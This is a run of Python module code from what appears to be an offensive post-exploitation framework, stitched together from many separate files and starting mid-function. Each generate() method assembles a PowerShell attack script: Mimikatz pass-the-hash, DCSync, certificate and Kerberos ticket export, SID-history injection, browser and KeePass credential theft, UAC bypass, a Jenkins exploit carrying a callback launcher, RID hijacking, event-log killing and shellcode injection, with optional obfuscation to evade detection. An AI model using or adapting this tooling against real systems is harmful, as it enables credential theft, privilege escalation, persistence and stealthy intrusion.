scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode # if a credential ID is specified, try to parse credID = self.options["CredID"]['Value'] if credID != "": if not self.mainMenu.credentials.is_credential_valid(credID): print helpers.color("[!] CredID is invalid!") return "" (credID, credType, domainName, userName, password, host, os, sid, notes) = self.mainMenu.credentials.get_credentials(credID)[0] if credType != "hash": print helpers.color("[!] An NTLM hash must be used!") return "" if userName != "": self.options["user"]['Value'] = userName if domainName != "": self.options["domain"]['Value'] = domainName if password != "": self.options["ntlm"]['Value'] = password if self.options["ntlm"]['Value'] == "": print helpers.color("[!] ntlm hash not specified") # build the custom command with whatever options we want command = "sekurlsa::pth /user:"******"user"]['Value'] command += " /domain:" + self.options["domain"]['Value'] command += " /ntlm:" + self.options["ntlm"]['Value'] # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"'" scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."' if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Invoke-NinjaCopy.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "$null = Invoke-NinjaCopy " for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-BrowserData.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode scriptEnd = "\nGet-BrowserInformation " # add any arguments to the end execution of the script for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n' + str( moduleName) + ' completed!"' if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): domainController = self.options['DomainController']['Value'] computerName = self.options['ComputerName']['Value'] domainAccount = self.options['DomainServiceAccount']['Value'] checkMgmt = self.options['CheckMgmt']['Value'] udpTimeOut = self.options['UDPTimeOut']['Value'] username = self.options['Username']['Value'] password = self.options['Password']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Get-SQLInstanceDomain.ps1" script = "" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" scriptEnd = " Get-SQLInstanceDomain" if username != "": scriptEnd += " -Username " + username if password != "": scriptEnd += " -Password " + password if domainController != "": scriptEnd += " -DomainController "+domainController if computerName != "": scriptEnd += " -ComputerName "+computerName if domainAccount != "": scriptEnd += " -DomainAccount "+domainAccount if checkMgmt.lower() != "false": scriptEnd += " -CheckMgmt" if udpTimeOut != "": scriptEnd += " -UDPTimeOut "+udpTimeOut if obfuscate: scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"lsadump::dcsync /user:"******"domain"]['Value'] != "": scriptEnd += " /domain:" + self.options['domain']['Value'] if self.options["dc"]['Value'] != "": scriptEnd += " /dc:" + self.options['dc']['Value'] scriptEnd += "\"';" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Get-GPPPassword.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Get-GPPPassword " for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += "| Out-String | %{$_ + \"`n\"};" scriptEnd += "'Get-GPPPassword completed'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): modPath = "/data/module_source/credentials/Invoke-InternalMonologue.ps1" moduleSource = self.mainMenu.installPath + modPath if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-InternalMonologue " # Add any arguments to the end execution of the script for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) # Get the random function name generated at install and patch the stager with the proper function name if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # extract all of our options listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: #Cmd = launcher print helpers.color("Agent Launcher code: "+ launcher) # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExploit-Jenkins" scriptEnd += " -Rhost "+str(self.options['Rhost']['Value']) scriptEnd += " -Port "+str(self.options['Port']['Value']) scriptEnd += " -Cmd \"" + launcher + "\"" if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ReverseDNSLookup.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ReverseDNSLookup" for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) # only return objects where HostName is not an IP (i.e. the address resolves) scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # add in the cert dumping command scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """ if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd # Get the random function name generated at install and patch the stager with the proper function name conn = self.get_db_connection() self.lock.acquire() cur = conn.cursor() cur.execute("SELECT Invoke_Mimikatz FROM functions") replacement = cur.fetchone() cur.close() self.lock.release() script = script.replace("Invoke-Mimikatz", replacement[0]) return script
def generate(self, obfuscate=False, obfuscationCommand=""): username = self.options['Username']['Value'] password = self.options['Password']['Value'] instance = self.options['Instance']['Value'] query = self.options['Query']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/collection/Get-SQLQuery.ps1" script = "" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: with open(moduleSource, 'r') as source: script = source.read() except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" scriptEnd = " Get-SQLQuery" if username != "": scriptEnd += " -Username " + username if password != "": scriptEnd += " -Password " + password if instance != "": scriptEnd += " -Instance " + instance scriptEnd += " -Query " + "\'" + query + "\'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-ARPScan.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ARPScan " for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += " | Select-Object MAC, Address | ft -autosize | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): listenerName = self.options['Listener']['Value'] # staging options userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-BypassUAC.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode if not self.mainMenu.listeners.is_listener_valid(listenerName): # not a valid listener, return nothing for the script print helpers.color("[!] Invalid listener: " + listenerName) return "" else: # generate the PowerShell one-liner with all of the proper options set launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds) if launcher == "": print helpers.color("[!] Error in launcher generation.") return "" else: scriptEnd = "Invoke-BypassUAC -Command \"%s\"" % (launcher) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-ChromeDump.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = " Get-ChromeDump" # add any arguments to the end execution of the script for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/MailRaider.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode + "\n" scriptEnd = moduleName + " " for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n' + str( moduleName) + ' completed!"' if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/Invoke-Phant0m.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nInvoke-Phant0m" for option, values in self.options.items(): if option.lower() != "agent" and option.lower() != "showall": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script += "| Out-String" script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1" scriptCmd = "Invoke-X" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath))) return "" script = f.read() f.close() scriptEnd = "\n%s" %(scriptCmd) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/Invoke-PrintDemon.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-PrintDemon" # Add any arguments to the end execution of the script for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd # Get the random function name generated at install and patch the stager with the proper function name conn = self.get_db_connection() self.lock.acquire() cur = conn.cursor() cur.execute("SELECT Invoke_Mimikatz FROM functions") replacement = cur.fetchone() cur.close() self.lock.release() script = script.replace("Invoke-Mimikatz", replacement[0]) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-IndexedItem.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Get-IndexedItem " for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) # extract the fields we want scriptEnd += " | ?{!($_.ITEMURL -like '*AppData*')} | Select-Object ITEMURL, COMPUTERNAME, FILEOWNER, SIZE, DATECREATED, DATEACCESSED, DATEMODIFIED, AUTOSUMMARY" scriptEnd += " | fl | Out-String;" if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerup.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = moduleCode scriptEnd = ';' + moduleName + " " for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-ShellcodeMSIL" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values['Value'].split("\\"))[1:] scriptEnd += " -" + str(option) + " @(" + sc + ")" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleName = self.info["Name"] # read in the common powerview.ps1 module source code moduleSource = self.mainMenu.installPath + "/data/module_source/collection/vaults/KeePassConfig.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() # get just the code needed for the specified function script = moduleCode # kill all KeePass instances first scriptEnd = "\nGet-Process *keepass* | Stop-Process -Force" scriptEnd += "\nFind-KeePassconfig | Add-KeePassConfigTrigger " for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # ridiculous escape format groups = " ".join([ '"\\""' + group.strip().strip("'\"") + '"""' for group in self.options["Groups"]['Value'].split(",") ]) # build the custom command with whatever options we want command = '""misc::addsid ' + self.options["User"][ 'Value'] + ' ' + groups # base64 encode the command to pass to Invoke-Mimikatz scriptEnd = "Invoke-Mimikatz -Command '\"" + command + "\"';" if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExploit-Jenkins" scriptEnd += " -Rhost " + str(self.options['Rhost']['Value']) scriptEnd += " -Port " + str(self.options['Port']['Value']) command = str(self.options['Cmd']['Value']) # if the command contains spaces, wrap it in quotes before passing to ps script if " " in command: scriptEnd += " -Cmd \"" + command + "\"" else: scriptEnd += " -Cmd " + command if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print(helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # build the dump command with whatever options we want scriptEnd = "Invoke-Mimikatz -DumpCreds;" for option,values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd # Get the random function name generated at install and patch the stager with the proper function name conn = self.get_db_connection() self.lock.acquire() cur = conn.cursor() cur.execute("SELECT Invoke_Mimikatz FROM functions") replacement = cur.fetchone() cur.close() self.lock.release() script = script.replace("Invoke-Mimikatz", replacement[0]) return script
def generate(self, obfuscate=False, obfuscationCommand=""): moduleSource = self.mainMenu.installPath + "/data/module_source/persistence/Invoke-RIDHijacking.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-RIDHijacking" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # the PowerShell script itself, with the command to invoke # for execution appended to the end. Scripts should output # everything to the pipeline for proper parsing. # # the script should be stripped of comments, with a link to any # original reference script included in the comments. # if you're reading in a large, external script that might be updates, # use the pattern below # read in the common module source code moduleSource = self.mainMenu.installPath + "data/module_source/code_execution/Execute-Url-Script.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "\nExecute-Url-Script" for option,values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/Invoke-Portscan.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print helpers.color("[!] Could not read module source path at: " + str(moduleSource)) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "Invoke-PortScan -noProgressMeter -f" for option, values in self.options.iteritems(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': if values['Value'].lower() == "true": # if we're just adding a switch scriptEnd += " -" + str(option) else: scriptEnd += " -" + str(option) + " " + str( values['Value']) scriptEnd += " | ? {$_.alive}| Select-Object HostName,@{name='OpenPorts';expression={$_.openPorts -join ','}} | ft -wrap | Out-String | %{$_ + \"`n\"}" if obfuscate: scriptEnd = helpers.obfuscate( psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd 